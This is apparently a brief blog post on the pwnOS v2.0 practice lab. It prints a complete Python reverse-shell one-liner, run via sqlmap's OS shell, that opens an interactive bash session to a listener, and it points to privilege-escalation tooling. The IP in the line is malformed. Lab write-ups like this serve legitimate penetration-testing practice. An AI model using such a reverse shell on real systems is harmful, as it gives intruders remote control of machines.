So I have been playing around with pwnOS v2.0. For spoilers, you can refer to this link. Due to my lack of attention, I did not spot the duplicate file and hence, did not get any valid root passwords, but knowing the solution, it does seem like quite a bit of a letdown.
One thing I did slightly differently was to use a python reverse shell documented in by pentestmonkey in the sqlmap –os-shell context. This worked sufficiently to give me an OOB shell.
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.10.10.128”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’
One tool which I had also encountered was Linux Exploit Suggester, although it seemed to have been updated about 5 months ago. Still, I’m sure it could be very useful if you have non-privileged shell access to a older, not-as-frequently-updated Linux box, and are searching for local privesc root exploits. I would also recommend this site for a list of commands you should run in order to enumerate the system after getting said shell access.